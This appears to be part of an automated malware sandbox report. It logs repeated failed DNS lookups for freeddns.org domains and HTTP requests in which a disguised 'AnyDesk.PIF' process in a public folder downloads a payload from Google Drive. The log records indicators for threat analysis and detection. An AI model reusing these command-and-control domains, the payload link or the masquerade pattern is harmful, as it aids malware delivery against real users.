                                                                                                Nov 30, 2024 21:20:18.511601925 CET1.1.1.1192.168.2.40x4194Name error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:19.952616930 CET1.1.1.1192.168.2.40x2d25Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:20.094705105 CET1.1.1.1192.168.2.40xce21Name error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:23.318753004 CET1.1.1.1192.168.2.40xd8c7Name error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:24.776655912 CET1.1.1.1192.168.2.40xa4ffName error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:26.107414961 CET1.1.1.1192.168.2.40x57c8Name error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:29.066092014 CET1.1.1.1192.168.2.40xc842Name error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:29.482296944 CET1.1.1.1192.168.2.40x7bb4Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:31.646773100 CET1.1.1.1192.168.2.40xaa02Name error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:34.881442070 CET1.1.1.1192.168.2.40xe99cName error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:35.309427977 CET1.1.1.1192.168.2.40x4f37Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:36.552264929 CET1.1.1.1192.168.2.40x83f3Name error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:39.734575033 CET1.1.1.1192.168.2.40x266dName error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:41.175610065 CET1.1.1.1192.168.2.40xbe07Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:41.345863104 CET1.1.1.1192.168.2.40x33a9Name error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:44.519197941 CET1.1.1.1192.168.2.40xf94bName error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:47.006577969 CET1.1.1.1192.168.2.40xece2Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:47.149168015 CET1.1.1.1192.168.2.40x29f0Name error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:49.314065933 CET1.1.1.1192.168.2.40x5bedName error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:51.751804113 CET1.1.1.1192.168.2.40x6e47Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:52.914022923 CET1.1.1.1192.168.2.40x91d2Name error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:54.063324928 CET1.1.1.1192.168.2.40x585cName error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:56.469964981 CET1.1.1.1192.168.2.40x5937Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:57.548737049 CET1.1.1.1192.168.2.40xdc16Name error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:59.485255957 CET1.1.1.1192.168.2.40x42afName error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:01.621457100 CET1.1.1.1192.168.2.40x5a07Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:02.566562891 CET1.1.1.1192.168.2.40xfab2Name error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:04.224761009 CET1.1.1.1192.168.2.40x64a3Name error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:06.749284983 CET1.1.1.1192.168.2.40x3a83Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:07.534893990 CET1.1.1.1192.168.2.40xf149Name error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:09.502218962 CET1.1.1.1192.168.2.40x3e8bName error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:11.579838991 CET1.1.1.1192.168.2.40xb596Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:12.236726999 CET1.1.1.1192.168.2.40x881Name error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:14.282865047 CET1.1.1.1192.168.2.40x5609Name error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:16.361119986 CET1.1.1.1192.168.2.40x9cccName error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:17.257592916 CET1.1.1.1192.168.2.40x9b03Name error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:19.078742981 CET1.1.1.1192.168.2.40x254eName error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:21.197849989 CET1.1.1.1192.168.2.40x47a9Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:22.063519955 CET1.1.1.1192.168.2.40xb4fcName error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:24.189595938 CET1.1.1.1192.168.2.40xa95Name error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:26.282574892 CET1.1.1.1192.168.2.40x9de0Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:27.052870035 CET1.1.1.1192.168.2.40x34e2Name error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:29.033406019 CET1.1.1.1192.168.2.40x9b27Name error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:31.181201935 CET1.1.1.1192.168.2.40x1ec7Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:32.036652088 CET1.1.1.1192.168.2.40xfbb6Name error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:34.034883976 CET1.1.1.1192.168.2.40x8e56Name error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:36.175532103 CET1.1.1.1192.168.2.40xd33bName error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:37.039459944 CET1.1.1.1192.168.2.40xd468Name error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:39.032274008 CET1.1.1.1192.168.2.40x7ee4Name error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:41.169986010 CET1.1.1.1192.168.2.40x76d0Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:42.039813995 CET1.1.1.1192.168.2.40x752Name error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:44.031375885 CET1.1.1.1192.168.2.40x3a84Name error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:46.171067953 CET1.1.1.1192.168.2.40x209Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:47.032495022 CET1.1.1.1192.168.2.40xed04Name error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:49.033123970 CET1.1.1.1192.168.2.40x8b51Name error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:51.031549931 CET1.1.1.1192.168.2.40xa315Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:52.032042980 CET1.1.1.1192.168.2.40x40f6Name error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:54.042223930 CET1.1.1.1192.168.2.40x1d59Name error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:56.313155890 CET1.1.1.1192.168.2.40x1d43Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:57.032442093 CET1.1.1.1192.168.2.40xa047Name error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:59.033225060 CET1.1.1.1192.168.2.40x398eName error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:01.173715115 CET1.1.1.1192.168.2.40x7091Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:02.032789946 CET1.1.1.1192.168.2.40xa8dName error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:04.035186052 CET1.1.1.1192.168.2.40x2836Name error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:06.171287060 CET1.1.1.1192.168.2.40x6b64Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:07.033813000 CET1.1.1.1192.168.2.40x85bcName error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:09.092350960 CET1.1.1.1192.168.2.40xfb01Name error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:11.178034067 CET1.1.1.1192.168.2.40x159dName error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:12.046544075 CET1.1.1.1192.168.2.40x6e51Name error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:14.033360958 CET1.1.1.1192.168.2.40x7e0dName error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:16.323441029 CET1.1.1.1192.168.2.40x4949Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:17.033569098 CET1.1.1.1192.168.2.40xf191Name error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:19.110893011 CET1.1.1.1192.168.2.40xf322Name error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:21.173793077 CET1.1.1.1192.168.2.40xb927Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:22.032862902 CET1.1.1.1192.168.2.40x6ba0Name error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:24.033253908 CET1.1.1.1192.168.2.40x36e9Name error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:26.035830021 CET1.1.1.1192.168.2.40xd564Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:27.033402920 CET1.1.1.1192.168.2.40xb41cName error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:29.032239914 CET1.1.1.1192.168.2.40x672aName error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:31.031441927 CET1.1.1.1192.168.2.40xb283Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:32.033715963 CET1.1.1.1192.168.2.40xb226Name error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:34.040313005 CET1.1.1.1192.168.2.40x762eName error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:36.171250105 CET1.1.1.1192.168.2.40xb5f4Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:37.031719923 CET1.1.1.1192.168.2.40xfe1eName error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:39.033891916 CET1.1.1.1192.168.2.40x9951Name error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:41.346797943 CET1.1.1.1192.168.2.40x294fName error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:42.032397985 CET1.1.1.1192.168.2.40x6ae2Name error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:44.311522007 CET1.1.1.1192.168.2.40xfaabName error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:46.170934916 CET1.1.1.1192.168.2.40xa0e8Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:47.036725998 CET1.1.1.1192.168.2.40xfccbName error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:49.032753944 CET1.1.1.1192.168.2.40x2538Name error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:51.171475887 CET1.1.1.1192.168.2.40x8159Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:51.312465906 CET1.1.1.1192.168.2.40x8159Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:52.031429052 CET1.1.1.1192.168.2.40x3a4fName error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:54.034245968 CET1.1.1.1192.168.2.40xb2afName error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:56.169811010 CET1.1.1.1192.168.2.40x3d1cName error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:57.032494068 CET1.1.1.1192.168.2.40xe5f5Name error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:59.129470110 CET1.1.1.1192.168.2.40xba9dName error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:01.176973104 CET1.1.1.1192.168.2.40xd1a1Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:02.529261112 CET1.1.1.1192.168.2.40xb5b1Name error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:04.033869028 CET1.1.1.1192.168.2.40x85e5Name error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:06.181725979 CET1.1.1.1192.168.2.40x64d5Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:07.032265902 CET1.1.1.1192.168.2.40x833eName error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:09.033204079 CET1.1.1.1192.168.2.40x5bd1Name error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:11.032233000 CET1.1.1.1192.168.2.40xb20Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:12.031757116 CET1.1.1.1192.168.2.40x61f6Name error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:14.032701015 CET1.1.1.1192.168.2.40xfbb3Name error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:16.175368071 CET1.1.1.1192.168.2.40x2f68Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:16.315465927 CET1.1.1.1192.168.2.40x2f68Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:17.033974886 CET1.1.1.1192.168.2.40x577dName error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:19.032387972 CET1.1.1.1192.168.2.40x5eceName error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:21.194648981 CET1.1.1.1192.168.2.40xcfa7Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:22.036382914 CET1.1.1.1192.168.2.40xdd36Name error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:24.032818079 CET1.1.1.1192.168.2.40xccebName error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:26.169893026 CET1.1.1.1192.168.2.40x371fName error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:27.037770987 CET1.1.1.1192.168.2.40xf41bName error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:29.031872988 CET1.1.1.1192.168.2.40x174aName error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:31.462622881 CET1.1.1.1192.168.2.40x2510Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:32.035029888 CET1.1.1.1192.168.2.40x2ddfName error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:34.055821896 CET1.1.1.1192.168.2.40x38f1Name error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:36.179821968 CET1.1.1.1192.168.2.40xc761Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:37.036088943 CET1.1.1.1192.168.2.40xcdb8Name error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:39.033771992 CET1.1.1.1192.168.2.40xf80fName error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:41.172506094 CET1.1.1.1192.168.2.40x63f7Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:42.032419920 CET1.1.1.1192.168.2.40xcdbName error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:44.032227993 CET1.1.1.1192.168.2.40x5cb0Name error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:46.173079014 CET1.1.1.1192.168.2.40x3b9Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:47.036376953 CET1.1.1.1192.168.2.40xe3c7Name error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:49.032840014 CET1.1.1.1192.168.2.40xa730Name error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:51.227725029 CET1.1.1.1192.168.2.40x2069Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:52.033319950 CET1.1.1.1192.168.2.40x3d7aName error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:54.105110884 CET1.1.1.1192.168.2.40x1ed6Name error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:56.033998966 CET1.1.1.1192.168.2.40x7764Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:57.034570932 CET1.1.1.1192.168.2.40x4a66Name error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:59.035414934 CET1.1.1.1192.168.2.40xb63Name error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:24:01.176018953 CET1.1.1.1192.168.2.40xca7aName error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:24:01.315201044 CET1.1.1.1192.168.2.40xca7aName error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:24:02.034182072 CET1.1.1.1192.168.2.40x17abName error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:24:06.454674959 CET1.1.1.1192.168.2.40x3dbName error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:24:06.870774984 CET1.1.1.1192.168.2.40xe7e3Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                • drive.google.com
                                                                                                • drive.usercontent.google.com
                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.449731172.217.19.2384433288C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-11-30 20:20:01 UTC205OUTGET /uc?export=download&id=1qaR7oME9Rq4xBPQuXwqOCqRneMWsSMRv HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                Host: drive.google.com
                                                                                                2024-11-30 20:20:01 UTC1319INHTTP/1.1 303 See Other
                                                                                                Content-Type: application/binary
                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                Date: Sat, 30 Nov 2024 20:20:01 GMT
                                                                                                Location: https://drive.usercontent.google.com/download?id=1qaR7oME9Rq4xBPQuXwqOCqRneMWsSMRv&export=download
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-_WWRKMy-gtKUpSsIxtA2wQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                Server: ESF
                                                                                                Content-Length: 0
                                                                                                X-XSS-Protection: 0
                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                Connection: close


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.449732142.250.181.334433288C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-11-30 20:20:03 UTC223OUTGET /download?id=1qaR7oME9Rq4xBPQuXwqOCqRneMWsSMRv&export=download HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                Host: drive.usercontent.google.com
                                                                                                2024-11-30 20:20:06 UTC4918INHTTP/1.1 200 OK
                                                                                                Content-Type: application/octet-stream
                                                                                                Content-Security-Policy: sandbox
                                                                                                Content-Security-Policy: default-src 'none'
                                                                                                Content-Security-Policy: frame-ancestors 'none'
                                                                                                X-Content-Security-Policy: sandbox
                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                                Cross-Origin-Resource-Policy: same-site
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Content-Disposition: attachment; filename="233_Puyiaiobyjk"
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Access-Control-Allow-Credentials: false
                                                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                Accept-Ranges: bytes
                                                                                                Content-Length: 1072224
                                                                                                Last-Modified: Fri, 29 Nov 2024 11:10:45 GMT
